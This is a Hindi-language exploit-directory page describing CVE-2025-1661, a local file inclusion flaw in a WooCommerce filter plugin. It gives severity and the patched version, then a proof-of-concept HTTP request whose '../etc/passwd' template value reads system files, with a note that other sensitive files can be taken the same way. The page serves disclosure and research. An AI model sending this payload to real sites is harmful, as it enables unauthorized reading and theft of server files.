Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-1661 — HUSKY – Products Filter Professional for WooCommerce plugin for WordPress Local File Inclusion (LFI) के प्रति संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/muhammadwaseem29/cve-2025-1661
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmuhammadwaseem29/cve-2025-1661

CVE-2025-1661

HUSKY – Products Filter Professional for WooCommerce plugin for WordPress Local File Inclusion (LFI) के प्रति संवेदनशील है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-1661 - HUSKY – WooCommerce के लिए प्रोडक्ट्स फ़िल्टर प्रोफेशनल में अप्रमाणित स्थानीय फ़ाइल समावेशन (LFI)

विवरण

WordPress के लिए HUSKY – Products Filter Professional for WooCommerce प्लगइन woof_text_search AJAX एक्शन के template पैरामीटर के माध्यम से सभी संस्करणों 1.3.6.5 तक स्थानीय फ़ाइल समावेशन (LFI) के प्रति संवेदनशील है।

यह अप्रमाणित हमलावरों को सर्वर पर मनमानी फ़ाइलों को शामिल करने और निष्पादित करने की अनुमति देता है, जिससे संभावित रूप से निम्नलिखित हो सकता है:

  • एक्सेस नियंत्रणों को बायपास करना
  • संवेदनशील डेटा निकालना
  • दूरस्थ कोड निष्पादन (RCE) यदि कुछ शर्तें पूरी होती हैं (जैसे, "सुरक्षित" फ़ाइल प्रकारों का अपलोड)

गंभीरता: क्रिटिकल

  • CVSS स्कोर: 9.8 (क्रिटिकल)
  • CWE ID: CWE-22 (पथ ट्रैवर्सल)
  • EPS स्कोर: 0.00061

प्रभावित संस्करण

  • संवेदनशील: <= 1.3.6.5
  • पैच किया गया संस्करण: 1.3.6.6

उपचार

संस्करण 1.3.6.6 या नए पैच किए गए संस्करण में अपडेट करें।


प्रूफ ऑफ कॉन्सेप्ट (PoC)

पुनरुत्पादन के चरण

  1. लक्ष्य वेबसाइट पर जाएँ।
  2. Burp Suite का उपयोग करके अनुरोध कैप्चर करें।
  3. अनुरोध विधि को POST में बदलें और निम्नलिखित पेलोड जोड़ें:
root@kitploit:~
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1  HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

action=woof_text_search&

IntercomVulnChecker Screenshot 4. यदि सफल होता है, तो सर्वर /etc/passwd की सामग्री लौटाएगा। 5. इसका उपयोग सर्वर से अन्य संवेदनशील फ़ाइलों को निकालने के लिए किया जा सकता है।


संदर्भ

  • Wordfence Advisory
  • WordPress Plugin Code
  • CVE Report

अस्वीकरण

यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए है। अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत परीक्षण अवैध और अनैतिक है। कोई भी सुरक्षा परीक्षण करने से पहले हमेशा स्पष्ट प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें